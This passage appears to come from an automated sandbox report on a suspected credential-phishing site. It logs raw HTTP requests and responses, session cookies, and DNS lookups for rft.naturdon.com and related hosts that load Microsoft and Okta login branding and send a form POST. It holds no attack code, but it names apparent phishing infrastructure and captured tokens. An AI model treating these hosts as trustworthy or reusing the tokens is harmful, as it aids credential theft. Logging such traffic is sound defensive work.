laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /yzUMXXAK9cdiVG7unTSOjXlhW72wM8rZJ7uRvQrQmnp9mH4LntaZDifn490180 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /uvJtmTGXX2g3FEEqQIMgBrLoxZ456mS64jlG3A6l7y7Lxkm6YTIoOlgS7jv42MEgh260 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /rsj9FvgfYrm0DCkU7R3E0ZVRtwZjLNORj7eVq7ghG3bg6DT6IOZl4JRef193 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /ijrlV3hi6dkeYhbR0U6WhmmiYz2MGccNsZegAMCklGrcaCM65n1iEmiCkEsATX4zN3WzSG5I12210 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /optadu1ofPxrFCa4cOe9bGejoa2vR7hUGzGuvm86IppsV4y85FAZpZxeuef235 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /uvJtmTGXX2g3FEEqQIMgBrLoxZ456mS64jlG3A6l7y7Lxkm6YTIoOlgS7jv42MEgh260 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://rft.naturdon.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rft.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bChJbJByRMoiWVIzJsvbypYtqUVUTWUTXNFKJKJACAZSJESGCWVJJAOEENGZXBFSRWIWRBRMCVRFSKpqYiU5PkU4ch34fiS6guv40 HTTP/1.1Host: d2fykjvf206smvkvkvv0u6jhkusv7w0lybl1wipgnt1qufyffe.sorenxw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dbd5a2dd-vmlo2cc2etebjdqhg-ytquz7jjmmuxj8qlopjyoab6y/logintenantbranding/0/illustration?ts=637920231785000429 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://rft.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dbd5a2dd-vmlo2cc2etebjdqhg-ytquz7jjmmuxj8qlopjyoab6y/logintenantbranding/0/bannerlogo?ts=637919603932887433 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://rft.naturdon.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dbd5a2dd-vmlo2cc2etebjdqhg-ytquz7jjmmuxj8qlopjyoab6y/logintenantbranding/0/bannerlogo?ts=637919603932887433 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /dbd5a2dd-vmlo2cc2etebjdqhg-ytquz7jjmmuxj8qlopjyoab6y/logintenantbranding/0/illustration?ts=637920231785000429 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rvBXzyX4Qq50i8TvtNXs8BpqNqxHqx6mzSSKcXalR4B6PLT8k9y HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InpJRS92MytVbEEvWHpyditRT01pOFE9PSIsInZhbHVlIjoicE9Ec1lyQU5Hc3JyTFdYMTZnS1I0RUlVN3o2ZUZVaDRSYzNIc3VaOFRWWUl5TWZnWjQ1UEJKMURWTWRDbUlIeEpiNUVCTVZIbEJaZDdDZUtTNmZDeFVFYkFocVhqdTZtaWc4WEQ5NzVWcTRxbHhFS2k5OFVtZ2VETk5Ja2xsbFYiLCJtYWMiOiIwNTQzMDY3M2FlMWFlYzY1YjA4NmJiYzI5YmJhMjZkM2EzYjczODQxOGQyMjg3YmFkMzAyMGIwMDAxMzBkNjZhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkJVeG9PYnk2T3Y1TFJsWW1KRTN0d2c9PSIsInZhbHVlIjoiYmpFcGRIRTBMTy9CM0Y1NGF0dUtBc0FIaE1HcEtOQ3o5VVFXSHlVLzB4Ym9QOFNEQ09kdDNXSU1rUWd4N3dxbWd1amlvVnhOOFYxQW52aFo3MWFLSHdkOTFZSlBoU1hUcFNkN01sUU1sOVR1VzdDYXRIL0ZIdDdVaitIajZWZWIiLCJtYWMiOiI1OTUwNDZhOTY1ODNlM2VlMjMwNWRiZGJjNTRlYWNjNGNjZmQ4NmZlNGMwMDM2ZDQwZjYwZWQzZWZmOGI4MTBhIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /bChJbJByRMoiWVIzJsvbypYtqUVUTWUTXNFKJKJACAZSJESGCWVJJAOEENGZXBFSRWIWRBRMCVRFSK12AAuQJBSo78Umueop42 HTTP/1.1Host: d2fykjvf206smvkvkvv0u6jhkusv7w0lybl1wipgnt1qufyffe.sorenxw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /bChJbJByRMoiWVIzJsvbypYtqUVUTWUTXNFKJKJACAZSJESGCWVJJAOEENGZXBFSRWIWRBRMCVRFSKyzUgP6dnOJOXM56dsnqr50 HTTP/1.1Host: d2fykjvf206smvkvkvv0u6jhkusv7w0lybl1wipgnt1qufyffe.sorenxw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: u17065553.ct.sendgrid.net
Source: global traffic DNS traffic detected: DNS query: app.salesforceiq.com
Source: global traffic DNS traffic detected: DNS query: registrosaraquari.com.br
Source: global traffic DNS traffic detected: DNS query: rft.naturdon.com
Source: global traffic DNS traffic detected: DNS query: code.jquery.com
Source: global traffic DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: developers.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: 2aezx.szsnqp.ru
Source: global traffic DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: ok4static.oktacdn.com
Source: global traffic DNS traffic detected: DNS query: objects.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: get.geojs.io
Source: global traffic DNS traffic detected: DNS query: d2fykjvf206smvkvkvv0u6jhkusv7w0lybl1wipgnt1qufyffe.sorenxw.es
Source: global traffic DNS traffic detected: DNS query: aadcdn.msauthimages.net
Source: unknown HTTP traffic detected: POST /yp9BZPnLvX9qppjZ6vwVf7ZEopBEJOVpdL8dvd HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveContent-Length: 807sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTfbXBFkAwDBioEq5sec-ch-ua-mobile: ?0Accept: */*Origin: https://rft.naturdon.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rft.naturdon.com/iVYo/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjFFSVYzWnU1NXU2K2ZwUElSUEMyNlE9PSIsInZhbHVlIjoiVTIyTWJtZDBBYjZOdmxRTTU1a253dk9TMWFPaE9CQlNHYk1GNTRDeEhqdE9uK3hhT0toVS9ZeEJMT0lvZE1xem13RFU3Q1c4NXMwNzZxdGJ1ZXFkTGlweDFPRjBIQWduRlJwTWVHUnVJSi92WnZUUDE5MVRmSnlEM0Z3TU9UOGYiLCJtYWMiOiIxNzQ2MjllZmU0ODgzOTdkYjE1Y2FmZGM5OTAwOTVhMTUyZWY4OWFmYzc0YTY4MTAzMjNkZThkZmViMWM2NzMxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Iis4QTh6ZzVYR0VnNUhVOXRyendhTWc9PSIsInZhbHVlIjoibTFCUTRvbHVlTEZiY3llcmduQ05adWJuN3hnZk9jaDV2WnZ3Smc2dHo0K25BbkxFOW9xVHNyWm9qU25iYU9NWnoxcDByYzFxeEErMTE2M3ExdEFhYzVUYnlObk0zbitlejlSMnZTYjFCODF2TVc1WTFkUFQzUXBqSUZxa1JwRW4iLCJtYWMiOiIyZTdkOGE0YmYzNzdiYWJkMGM5Mzg1ZjRjMzNkYWNhOTY2ODQ3MTcyODRiYmNiY2EzOTU0OGI0Yjc3NGM4YTBiIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 17 Mar 2025 18:02:13 GMTserver: LiteSpeedvary: User-Agentalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 18:02:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qy3fa0ucgWYBvfzYV4smuYEaxjTnJOacrcbwajYJvX320ewuMZa4t0N29Q%2BF3OuW60kNEU5p63WcrlIcrVUtERXKZLESMDoDkq1mpEpFPA8f31BHPbIkA6sXR9UL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=26615&min_rtt=26602&rtt_var=9985&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2049&delivery_rate=107059&cwnd=108&unsent_bytes=0&cid=1dec1b29506d439c&ts=204&x=0"Server: cloudflareCF-RAY: 921e66da3c0f4396-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1627&rtt_var=617&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1713&delivery_rate=1764350&cwnd=218&unsent_bytes=0&cid=4bd63e04c2c207a3&ts=547&x=0"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 18:02:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: HITAge: 77Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IY4tb3JcbqBy1KBuZet4O2q6QpdoPohZLx5P1M3Q4V5WtpQG9u7kbOWeSSmnfPjz6uqVy5Zl%2BFiANfesoJbAJgT45g8mOoOr44mtIAI2jQrnWeLkAxsWt9tAf7X2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=26625&min_rtt=26593&rtt_var=9995&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1143&delivery_rate=107095&cwnd=153&unsent_bytes=0&cid=32c5e885c0ca2059&ts=51&x=0"Cache-Control: max-age=14400Server: cloudflareCF-RAY: 921e66e1dc587283-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1973&rtt_var=741&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1895&delivery_rate=1475492&cwnd=188&unsent_bytes=0&cid=e84f2fdf74be592a&ts=148&x=0"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 18:02:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R3%2FTaqNmeDQMods74ypcwdVlCgJv%2B%2BA47C085gB0sXIgtqEpPyeWE6VEFcv4uL3K3%2Bu%2FuB5%2F9C4pxn090pJ%2BgNuIb0%2FJAATr8wvoZYUyfiycdH%2BY7QGVtP3DppLT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=26650&min_rtt=26577&rtt_var=10019&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2062&delivery_rate=107160&cwnd=116&unsent_bytes=0&cid=848454862a8a8d2f&ts=319&x=0"Server: cloudflareCF-RAY: 921e66e5a9f642bc-EWRalt-svc: h3=":443"; ma=86400server-timing: 